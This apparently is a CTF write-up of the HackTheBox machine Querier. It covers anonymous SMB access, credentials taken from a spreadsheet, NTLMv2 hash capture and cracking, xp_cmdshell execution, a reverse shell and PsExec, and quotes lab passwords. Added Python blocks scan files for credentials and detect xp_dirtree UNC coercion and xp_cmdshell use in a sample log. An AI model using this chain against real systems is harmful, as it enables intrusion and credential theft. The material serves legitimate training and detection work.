HackTheBox — Querier Writeup (10.10.10.125)

mansk1es
5 min read, Feb 26, 2021

Querier is a medium-rated Windows machine. It exposes an SMB share that allows anonymous access and contains a single file with enough information to authenticate to MSSQL as a low-privileged SQL user. From there I captured the NTLMv2 hash of another MSSQL user with ‘Responder’ and cracked it to obtain a higher-privileged MSSQL login, enabled xp_cmdshell to execute system commands and gained an initial foothold as a low-privileged user, then discovered the Administrator’s plaintext password and used PsExec with those credentials to completely compromise the machine. Let’s get right to it.

First and foremost, we start with the nmap scan.

Full nmap scan results

We can see that the SMB ports are open (139, 445), and another interesting port is 1433 (MSSQL).

I list the SMB shares with ‘smbclient’ as an anonymous user (not providing a password, just pressing Enter).

Listing the machine’s SMB shares

I see an interesting share named ‘Reports’, which I will try to access through anonymous authentication as well.

Anonymous authentication succeeded.

I list the contents of the share and discover a .xlsm file, which I download to my machine with the ‘get’ command in smbclient.

After opening the document with LibreOffice and seeing an apparently empty spreadsheet, I decide to run ‘strings’ on the file.

Hmm, it seems to contain some kind of folder/file hierarchy (an .xlsm is an Office Open XML document, i.e. a ZIP container of XML parts plus the macro project), so I ‘binwalk’ the file to extract the files within it.

binwalk -e (extract)

It indeed extracted some folders and the files inside them. I explored the extracted data looking for anything that resembles credentials.
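The strings/binwalk step above works because the workbook is a ZIP package. As an added example (not code from the writeup), the script below builds a tiny constructed stand-in for such a package in memory, lists its members the way binwalk exposed them, and scans each member's raw bytes for credential-shaped tokens such as `User Id=` and `Password=`. The member names follow the real Office Open XML layout, but the macro part here is plain text with an invented connection string; in a real file `xl/vbaProject.bin` is an OLE2 container whose string literals are usually still visible to a byte scan.

```python
import io
import re
import zipfile

# An .xlsm is an Office Open XML package: a ZIP archive of XML parts plus a
# vbaProject.bin part holding the macros. The members below are CONSTRUCTED
# for this example; the connection string and credential are invented.
SAMPLE_MEMBERS = {
    "[Content_Types].xml": '<?xml version="1.0" encoding="UTF-8"?><Types/>',
    "xl/workbook.xml": "<workbook/>",
    "xl/vbaProject.bin": (
        'Attribute VB_Name = "Module1"\r\n'
        "Sub Connect()\r\n"
        '    conn.Open "Provider=SQLOLEDB;Data Source=DB01;'
        'User Id=reporting;Password=Example-Pass-123"\r\n'
        "End Sub\r\n"
    ),
}

# Credential-shaped tokens commonly found in embedded connection strings.
CREDENTIAL_PATTERNS = {
    "password": re.compile(rb"(?i)\b(?:password|pwd)\s*=\s*([^;\"'\s]+)"),
    "user": re.compile(rb"(?i)\b(?:user\s*id|uid|username|user)\s*=\s*([^;\"'\s]+)"),
}


def build_sample_xlsm() -> bytes:
    """Pack the constructed members into an in-memory ZIP, like a real .xlsm."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, text in SAMPLE_MEMBERS.items():
            zf.writestr(name, text)
    return buf.getvalue()


def list_members(doc: bytes):
    """The folder/file hierarchy that 'strings' hinted at: the ZIP directory."""
    with zipfile.ZipFile(io.BytesIO(doc)) as zf:
        return zf.namelist()


def find_credential_strings(doc: bytes):
    """Scan every member's raw bytes; return (member, kind, value) hits."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(doc)) as zf:
        for name in zf.namelist():
            data = zf.read(name)
            for kind, pattern in CREDENTIAL_PATTERNS.items():
                for m in pattern.finditer(data):
                    hits.append((name, kind, m.group(1).decode("utf-8", "replace")))
    return hits


if __name__ == "__main__":
    sample = build_sample_xlsm()
    print("members:", list_members(sample))
    for member, kind, value in find_credential_strings(sample):
        print(f"{member}: {kind} = {value}")
```

On a real workbook you would pass the file's bytes to `list_members` and `find_credential_strings` instead of the constructed sample; the same scan is a cheap pre-publication check for documents that are about to land on a share with anonymous access.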

The credentials “reporting : PcwTWTHRwryjc$c6”

I then try these credentials against the MSSQL port, using impacket’s mssqlclient.

Successfully authenticated to MSSQL as “reporting” user!

Great! I authenticated to the MSSQL server, but found that I do not have the permissions to enable xp_cmdshell, so I fire up Responder to capture an NTLMv2 hash.

Running Responder on the tun0 interface

Now I’ll make the MSSQL server reach out to a (most likely non-existent) network share on my machine, and catch the NTLMv2 hash of the account it authenticates with.

Triggering the authentication attempt
Captured an NTLMv2 hash of the “MSSQL-SVC” user!

Sweet, I captured an NTLMv2 hash of the “MSSQL-SVC” user. Now I try to crack this hash using ‘hashcat’.

hash cracked!

I successfully cracked the hash! Now we have another set of credentials: MSSQL-SVC : corporate568

I now try to authenticate as this user to MSSQL.

Successfully authenticated as “MSSQL-SVC”! Running enable_xp_cmdshell

Awesome! I authenticated as MSSQL-SVC, and this account has enough permissions to enable xp_cmdshell and execute system commands!
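Both of the steps above, coercing the SQL Server service account into an outbound SMB authentication (typically via xp_dirtree or a similar procedure given a UNC path) and then enabling xp_cmdshell, are visible in SQL Server's own audit stream. The following is an added example, not from the writeup, of detection logic run over constructed audit lines: the simplified `<timestamp> <login> <statement>` layout, the logins, the hosts and addresses, and the `TRUSTED_UNC_HOSTS` allow-list are all assumptions made for the example.

```python
import re

# CONSTRUCTED sample lines in a simplified "<timestamp> <login> <statement>"
# layout standing in for SQL Server Audit / Extended Events output. Logins,
# hosts and addresses are invented for this example.
SAMPLE_AUDIT_LINES = [
    "2021-02-26T10:01:12Z reporting  SELECT name FROM sys.databases",
    "2021-02-26T10:02:40Z reporting  EXEC master..xp_dirtree '\\\\10.10.14.5\\share', 1, 1",
    "2021-02-26T10:05:03Z mssql-svc  EXEC sp_configure 'show advanced options', 1; RECONFIGURE",
    "2021-02-26T10:05:04Z mssql-svc  EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE",
    "2021-02-26T10:05:30Z mssql-svc  EXEC xp_cmdshell 'whoami'",
    "2021-02-26T10:07:00Z backupsvc  EXEC master..xp_dirtree '\\\\fileserver01\\backups', 1, 1",
]

# Hosts the SQL Server is expected to touch over SMB (assumed allow-list).
TRUSTED_UNC_HOSTS = {"fileserver01"}

LINE = re.compile(r"^(\S+)\s+(\S+)\s+(.*)$")
# Procedures that make the service account authenticate to a UNC path.
UNC_PROC = re.compile(r"(?i)\bxp_(?:dirtree|fileexist|subdirs)\b.*?'\\\\([^\\']+)\\")
CMDSHELL_ENABLE = re.compile(r"(?i)\bsp_configure\s+'xp_cmdshell'\s*,\s*1\b")
CMDSHELL_EXEC = re.compile(r"(?i)\bxp_cmdshell\b")


def classify(line):
    """Return (timestamp, login, alert, detail) or None for a benign line."""
    m = LINE.match(line)
    if not m:
        return None
    ts, login, stmt = m.groups()
    if CMDSHELL_ENABLE.search(stmt):
        return (ts, login, "xp_cmdshell_enabled", stmt)
    if CMDSHELL_EXEC.search(stmt):
        return (ts, login, "xp_cmdshell_exec", stmt)
    u = UNC_PROC.search(stmt)
    if u and u.group(1).lower() not in TRUSTED_UNC_HOSTS:
        # Outbound SMB auth to an unknown host leaks a NetNTLMv2 challenge-response.
        return (ts, login, "unc_to_untrusted_host", u.group(1))
    return None


def scan(lines):
    """Run classify over a log and keep only the alerts, in log order."""
    return [alert for alert in map(classify, lines) if alert is not None]


def logins_with_cmdshell(lines):
    """Logins that both enabled and executed xp_cmdshell: a strong RCE signal."""
    enabled, executed = set(), set()
    for _, login, alert, _ in scan(lines):
        if alert == "xp_cmdshell_enabled":
            enabled.add(login)
        elif alert == "xp_cmdshell_exec":
            executed.add(login)
    return sorted(enabled & executed)


if __name__ == "__main__":
    for ts, login, alert, detail in scan(SAMPLE_AUDIT_LINES):
        print(f"{ts} {login:<10} {alert:<24} {detail}")
    print("cmdshell users:", logins_with_cmdshell(SAMPLE_AUDIT_LINES))
```

The allow-list matters: legitimate backup jobs also call xp_dirtree against file servers, so the rule only fires on UNC hosts that are not expected, and the xp_cmdshell rules fire regardless of who runs them because that option should stay disabled on a hardened instance.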

RCE

Awesome! I now have remote command execution. I check whether PowerShell exists on the machine, find that it does, and generate a PowerShell reverse shell with itm4n’s tool: https://itm4n.github.io/tools/

Checking if PowerShell exists on the target machine
Generating a one-liner base64-encoded PowerShell reverse shell to my machine on port 443

Running the generated base64-encoded reverse shell to gain an initial foothold as “mssql-svc”.

Reverse shell returned

We’re in the system! Grabbing user.txt:

Checking the user’s privileges with the “whoami /priv” command shows the interesting SeImpersonatePrivilege, which instantly makes me reach for JuicyPotato. JuicyPotato wasn’t working, however, as I couldn’t find any valid CLSIDs, so I decided to transfer winPEAS to the target machine to see if there’s anything special or out of place.

whoami /priv

Setting up a Python HTTP server on port 80 with the command “python3 -m http.server 80”

Using Invoke-WebRequest on the target machine to download the file

Launching wp.exe: .\wp.exe

I then launched .\wp.exe and saw a plaintext Administrator password.

password extracted = MyUnclesAreMarioAndLuigi!!1!

This looks like credentials! I now use PsExec, authenticate with the credentials “Administrator : MyUnclesAreMarioAndLuigi!!1!” and successfully gain full control over the target system. Grabbing root.txt and running “ipconfig” as additional proof.

PWNED

I fully compromised the target system! Great box, very fun and educational.
